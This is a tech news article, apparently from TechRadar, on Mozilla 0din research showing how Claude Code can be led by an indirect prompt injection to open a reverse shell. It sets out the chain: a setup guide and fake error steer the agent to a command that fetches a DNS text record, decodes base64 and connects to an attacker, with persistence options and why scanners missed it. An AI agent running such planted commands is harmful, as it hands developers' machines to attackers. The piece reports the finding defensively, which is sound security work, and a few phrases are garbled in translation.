- Claude Code executed the dangerous command while treating it as a routine recovery
- A single fake error message triggered the entire chain of hidden attacks
- Static scanners and firewalls saw nothing more than a normal DNS resolution
Researchers on Mozilla’s 0din team have demonstrated how Claude Code can be manipulated to open a hidden reverse shell on a developer’s device.
The exploit did not require malicious code within the cloned project, as every visible file passed a regular check without raising suspicion.
Instead, the dangerous instruction arrived later, obtained at runtime from a DNS text record that no scanner would ever inspect.
How a routine configuration error became an entry point
The attack began with a simple Markdown file that explained how to install a package called Axiom, a common monitoring tool.
Running the tool without initializing it resulted in a simple error message directing the user to run a specific configuration command.
The research team noticed that this pattern closely resembles ordinary developer troubleshooting, which is why it evaded suspicion so effectively.
Claude Code, trying only to be helpful, followed that automatically typed instruction, treating the documented fix as an ordinary routine error recovery.
That single command triggered a hidden shell script that silently queried a DNS text record completely controlled by the remote attacker.
The log was decoded into a base64-encoded reverse shell command, which was executed silently and connected directly to the attacker’s remote server.
Persistence was also possible once inside, as the attacker could drop an SSH key or schedule a hidden cron job.
A single link to a shared repository in a job post or chat message could expose all developers who simply open it.
Common security tools, such as antivirus software or firewall protection, did not detect this flaw, as none of the individual steps seemed suspicious on their own.
Static code scanning tools only recorded a routine DNS lookup, which did not indicate anything malicious in process.
Network monitoring recorded nothing more than an ordinary domain name resolution, and the agent itself saw the command as a pre-authorized configuration.
0din emphasized that encoding agents should inspect exactly which configuration script will actually be executed before running anything.
He concluded that developers should never assume that an unknown repository is trustworthy, regardless of how common its configuration files appear.
This case suggests that AI tools based on large language models may need much stronger runtime safeguards.
Until such agents can meaningfully assess what a command is actually executing, it will likely remain difficult to prevent similar indirect attacks.
The broader lesson extends beyond Code Claude, as most agent AI systems share similar blind spots toward indirect immediate injection.
For now, treating unknown automation as a genuine risk remains the most reliable protection available to most individual developers.
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds.




